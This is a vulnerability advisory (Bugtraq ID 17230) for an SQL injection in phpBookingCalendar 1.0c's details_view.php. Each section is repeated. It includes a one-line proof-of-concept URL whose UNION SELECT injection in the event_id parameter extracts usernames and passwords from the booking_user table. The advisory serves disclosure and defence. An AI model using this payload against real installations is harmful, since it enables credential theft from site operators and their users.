PHPBookingCalendar Details_View.PHP SQL Injection Vulnerability
BID:17230
Info
PHPBookingCalendar Details_View.PHP SQL Injection Vulnerability
| Bugtraq ID: | 17230 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 25 2006 12:00AM |
| Updated: | Mar 27 2006 08:39PM |
| Credit: | undefined1 is credited with the discovery of this vulnerability. |
| Vulnerable: |
phpBookingCalendar phpBookingCalendar 1.0c |
| Not Vulnerable: | |
Discussion
PHPBookingCalendar Details_View.PHP SQL Injection Vulnerability
phpBookingCalendar is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
phpBookingCalendar is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
PHPBookingCalendar Details_View.PHP SQL Injection Vulnerability
This issue can be exploited through a web client.
The following proof of concept has been provided:
http://www.example.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
This issue can be exploited through a web client.
The following proof of concept has been provided:
http://www.example.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
Solution / Fix
PHPBookingCalendar Details_View.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
References
PHPBookingCalendar Details_View.PHP SQL Injection Vulnerability
References:
References:
- phpBookingCalendar (JJW Web Design)